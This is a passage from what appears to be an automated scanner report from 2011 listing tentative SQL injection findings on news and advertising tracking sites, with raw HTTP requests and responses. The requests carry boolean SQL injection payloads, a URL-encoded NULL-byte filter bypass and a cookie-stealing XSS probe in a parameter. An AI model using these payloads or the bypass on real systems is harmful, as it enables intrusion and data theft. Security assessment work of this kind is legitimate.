rdrlst=43n0pahlkze3o000000043m04157rlklhm40000000h3m05144qlkze3o000000043m04157olkxlm50000000c3m0513y7lkze3o000000043m0415sklkkpqq0000000p3m050hsnlkze3o000000043m0412nslkxrxz000000063m050x1blkkpqq0000000p3m050hsplkkpqq0000000p3m0512gdlkkyy00000000l3m050morlkkxrb0000000m3m0514k6lkxlm50000000c3m050w35lkze3o000000043m0413pylkze3o000000043m0414rwlkxlm50000000c3m051628lkze3y000000023m0214khlkxlm50000000c3m051196lkkkbe0000000v3m0513x4lkxrxz000000063m0513qmlkze3y000000023m021195lkkpqh0000000q3m051194lkkjj40000000w3m050dlxlkb5u2000000103m0516nulkxlm50000000c3m051193lkkplo0000000s3m0513q8lkze3y000000023m020p46lkkpqq0000000p3m051192lkkpke0000000u3m05008slklhm40000000h3m0516oilkxlm50000000c3m050moylkl0r50000000i3m050zg4lkze3y000000023m0213qwlkzfle000000013m01144elkze3o000000043m0412ftlkxrxz000000063m0510poljyxb4000000173m050e6llkl0r50000000i3m05138olkxrxz000000063m0516dnlkze3o000000043m04167ulkxq41000000073m0514qllkxlm50000000c3m05159olk8fax000000123m0515halkxlm50000000c3m050m0ulkl0r50000000i3m050m0plkkxrb0000000m3m0516e6lkxnbq0000000b3m0513zblkze3y000000023m0214xnlkxlm50000000c3m05167blkl0r50000000i3m0516dxlkze3o000000043m041391lkxrxz000000063m0515zhlkze3y000000023m021672lkkxrb0000000m3m050ycrlkncow0000000g3m05158mlkze3o000000043m040okclkze3o000000043m041015lkze3y000000023m0213lelkxrxz000000063m0513yolkze3o000000043m04137rlkkpqq0000000p3m050o
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.washingtonpost.com%2F%2Fvendor%2Fsurvey-gizmo.jsp%3FpollURL%3Dhttp%3A%2F%2Fwww.surveygizmo.com%2Fs3%2Fpolljs%26pollID%3D539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com//vendor/survey-gizmo.jsp?pollURL=http://www.surveygizmo.com/s3/polljs&pollID=539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.2483126303'%20or%201%3d2--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3EE51B53765DEA0EE049F10383DA89D7; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si90193m040k0c50v; rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkze3y000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkze3y000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkze3y000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkze3y000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkze3y000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkze3y000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkze3y000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01lkze3o000000033m0315holkxlm50000000b3m040m7alkkxrb0000000l3m0413mklkxrxz000000053m040m7flkkyyl0000000j3m04101ulkze3o000000033m030zoklkze3o000000033m0312zglkxrxz000000053m0413lxlkxrxz000000053m040zp4lkze3o000000033m03148ilkxlm50000000b3m040xvclkze3o000000033m0312yxlkxrxz000000053m0415iglkxq0l000000073m0413n7lkze3y000000013m0116s2lkxpyu000000083m0414hplkxlm50000000b3m040znmlk3462000000143m0414hclkxlm50000000b3m040wd7lkze3o000000033m03102plkxrxz000000053m0410tylkkpku0000000s3m040p1blkb5u20000000z3m040p1alkze3o000000033m0300bvlk9pe8000000103m0415xylk60qe000000133m0410lxlkxrxz000000053m04103blkxrxz000000053m0410telkd7nq0000000y3m0416rslkxppm000000093m040c9slk9pe8000000103m0413mxlkze3o000000033m0312emlkze3o000000033m0310rdlkdkly0000000w3m04126qlkxrxz000000053m040mj2lkkxrb0000000l3m040kualkkpqq0000000o3m040z9zlkze3y000000013m01163plkxlm50000000b3m040z9xlkze3o000000033m030m45lkl0r50000000h3m040m40lkkxrb0000000l3m040zqylkxrxz000000053m040mjelkkxrb0000000l3m0412qnlkkplt0000000q3m040ovslkze3o000000033m0314e9lkze3o000000033m030bo8lkb5u20000000z3m0412x6lkxrxz000000053m040mjjlkl0r50000000h3m041342lkze3y000000013m010lw5lkb5u20000000z3m0416aulkze3o000000033m0316atlkxlm50000000b3m0415k9lkxlm50000000b3m041203lkb5u20000000z3m041204lkkyy00000000k3m04163clkxlm50000000b3m040afqlkze3o000000033m030o0vlkkpqx0000000n3m040z2ilkkxrb0000000l3m0413ovlkxrxz000000053m04; sglst=2280sbpelkxlm50000000b3m040k0b50bdsnlkxlm5006bu00b3m040k0b50barllkxlm5006bu00b3m040k0b50bcg5lkxlm5006bu00b3m040k0b50b9rslkkpke0d2dl00t3m040k0c50tam5lkkxr8002zw00m3m040k0c50mcd4lkxlm5006bu00b3m040k0b50bcrglkxlm5006bu00b3m040k0b50bcnolkxlm5006bu00b3m040k0b50babelkxlm5006bu00b3m040k0b50bdd8lkxlm5006bu00b3m040k0b50bcy2lkxlm5006bu00b3m040k0b50baoplkb5u209jqc0063e000j00500cnxlkxlm50000000b3m040k0b50bbq3lkxlm5006bu00b3m040k0b50baoilkxlm5006bu00b3m040k0b50bbvplkxlm5006bu00b3m040k0b50b942lkb5u20mfs300o3l000k005009ullkxlm5006bu00b3m040k0b50b8ndlkb5u20mfs300o3l000k00500bvclkxlm5006bu00b3m040k0b50bc5flkxlm5006bu00b3m040k0b50b56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00b3m040k0b50bawklkxlm5006bu00b3m040k0b50basulkb5u209jqc0063e000j00500crplkxlm5006bu00b3m040k0b50basqlkxlm5006bu00b3m040k0b50bc5rlkov6e0000000e3m040k0c50eaw8lkxlm5006bu00b3m040k0b50bc60lkxlm5006bu00b3m040k0b50bdc4lkxlm5006bu00b3m040k0b50bd26lkxlm5006bu00b3m040k0b50bdnjlkxlm5006bu00b3m040k0b50bbrilkxlm5006bu00b3m040k0b50bcbclkxlm5006bu00b3m040k0b50bc85lkxlm5006bu00b3m040k0b50bcsslkxlm5006bu00b3m040k0b50bc80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g800y3m040k0c50vc1elkxlm5006bu00b3m040k0b50bc81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00b3m040k0b50bc8flkxlm5006bu00b3m040k0b50ba6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00b3m040k0b50b9z6lkxlm50000000b3m040k0b50bdbtlkxlm5006bu00b3m040k0b50b9q4lkxlm5006bu00b3m040k0b50b0kllklhm40c4010053l000k00500dyllkxlm5006bu00b3m040k0b50bb3zlkxlm5006bu00b3m040k0b50b9q5lkb5u20mfs300o3l000k005009mjlkxlm50000000b3m040k0b50bdgflkkpke0d2dl00t3m040k0c50t0t7ljyxb410gsu0163m040k0c50vbo0lkb5u20mm3x00z3m040k0c50vbo1lkkyy00cmo50093l000k005009pglkxlm5006bu00b3m040k0b50bd86lklhm40c4010053l000k00500cwalkxlm5006bu00b3m040k0b50bdqllkxlm5006bu00b3m040k0b50bd84lkxlm5006bu00b3m040k0b50bdz3lkxlm5006bu00b3m040k0b50bcm6lkxlm5006bu00b3m040k0b50bcxdlkxlm5006bu00b3m040k0b50b719lkb5u20mm3x00h3m040k0b50c71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00b3m040k0b50bcc3lkxlm5006bu00b3m040k0b50bdgilkb5u209jqc0063e000j00500cthlkxlm5006bu00b3m040k0b50b4wclkb5u20mm3x00h3m040k0b50ca0ulkxlm5006bu00b3m040k0b50b5mrlkb5u20mfs300o3l000k005008eklkkpke0cw1r00i3l000k00500arilkxlm50000000b3m040k0b50bcbplkxlm5006bu00b3m040k0b50bbwjlkkyy00cszz00k3m040k0c50k9gelkxlm5006bu00b3m040k0b50b; vstcnt=417k010r164slly127p10f24exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:28 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tzr01a3m050k0d50w; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:28 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43n0pahlkze3o000000043m04157rlklhm40000000h3m05144qlkze3o000000043m04157olkxlm50000000c3m0513y7lkze3o000000043m0415sklkkpqq0000000p3m050hsnlkze3o000000043m0412nslkxrxz000000063m050x1blkkpqq0000000p3m050hsplkkpqq0000000p3m0512gdlkkyy00000000l3m050morlkkxrb0000000m3m0514k6lkxlm50000000c3m050w35lkze3o000000043m0413pylkze3o000000043m0414rwlkxlm50000000c3m051628lkze3y000000023m0214khlkxlm50000000c3m051196lkkkbe0000000v3m0513x4lkxrxz000000063m0513qmlkze3y000000023m021195lkkpqh0000000q3m051194lkkjj40000000w3m050dlxlkb5u2000000103m0516nulkxlm50000000c3m051193lkkplo0000000s3m0513q8lkze3y000000023m020p46lkkpqq0000000p3m051192lkkpke0000000u3m05008slklhm40000000h3m0516oilkxlm50000000c3m050moylkl0r50000000i3m050zg4lkze3y000000023m0213qwlkzflg000000013m01144elkze3o000000043m0412ftlkxrxz000000063m0510poljyxb4000000173m050e6llkl0r50000000i3m05138olkxrxz000000063m0516dnlkze3o000000043m04167ulkxq41000000073m0514qllkxlm50000000c3m05159olk8fax000000123m0515halkxlm50000000c3m050m0ulkl0r50000000i3m050m0plkkxrb0000000m3m0516e6lkxnbq0000000b3m0513zblkze3y000000023m0214xnlkxlm50000000c3m05167blkl0r50000000i3m0516dxlkze3o000000043m041391lkxrxz000000063m0515zhlkze3y000000023m021672lkkxrb0000000m3m050ycrlkncow0000000g3m05158mlkze3o000000043m040okclkze3o000000043m041015lkze3y000000023m0213lelkxrxz000000063m0513yolkze3o000000043m04137rlkkpqq0000000p3m050ojulkze3o000000043m041240lkxrxz000000063m0514ozlkxlm50000000c3m0514bmlkxrxz000000063m0514j7lkxlm50000000c3m0514bzlkxlm50000000c3m050ni1lkb5u2000000103m0511pj
...[SNIP]...

1.12. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.philly.com
Path:   /b/ss/phillycom/1/H.17/s67586282941047

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/phillycom%00'/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:20:28 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/phillycom was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/phillycom%00''/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:20:28 GMT
Server: Omniture DC/2.0.0
xserver: www622
Content-Length: 0
Content-Type: text/html


1.13. http://q1.checkm8.com/adam/detected [JE parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The JE parameter appears to be vulnerable to SQL injection attacks. The payloads 20703968%20or%201%3d1--%20 and 20703968%20or%201%3d2--%20 were each submitted in the JE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=120703968%20or%201%3d1--%20&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: dt=95,20110510142256,OS=WIN7&JE=120703968%20or%201%3d1--%20&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d6ZLW3wP1GZRv1R7SOoa;Path=/;
Set-cookie: C=o6ZLW3w4G6NZcaabaW4OH3g;Path=/;Expires=Mon, 24-Sep-2074 17:56:16 GMT;
Set-cookie: O=e6ZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:16 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151986112/1225783813/388016880/819068785
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

Request 2

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=120703968%20or%201%3d2--%20&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142256,OS=WIN7&JE=120703968%20or%201%3d2--%20&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d6ZLW3wJ6HYKwEXQK2Ba;Path=/;
Set-cookie: C=o6ZLW3wmSVMSdaabaZVLWKKc;Path=/;Expires=Mon, 24-Sep-2074 17:56:16 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/3846566913/1588776318
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

1.14. http://q1.checkm8.com/adam/detected [WIDTH parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads 45239817%20or%201%3d1--%20 and 45239817%20or%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=86545239817%20or%201%3d1--%20&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:48 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.14 NY-AD4
Set-cookie: dt=95,20110510142248,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=dYZLW3wTXTJTvl5S9Pya;Path=/;
Set-cookie: C=oYZLW3w4P620caabaMRGZSf;Path=/;Expires=Mon, 24-Sep-2074 17:56:08 GMT;
Set-cookie: O=eYZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:08 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 154727442/1228549327/311497400/1394483737
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

Request 2

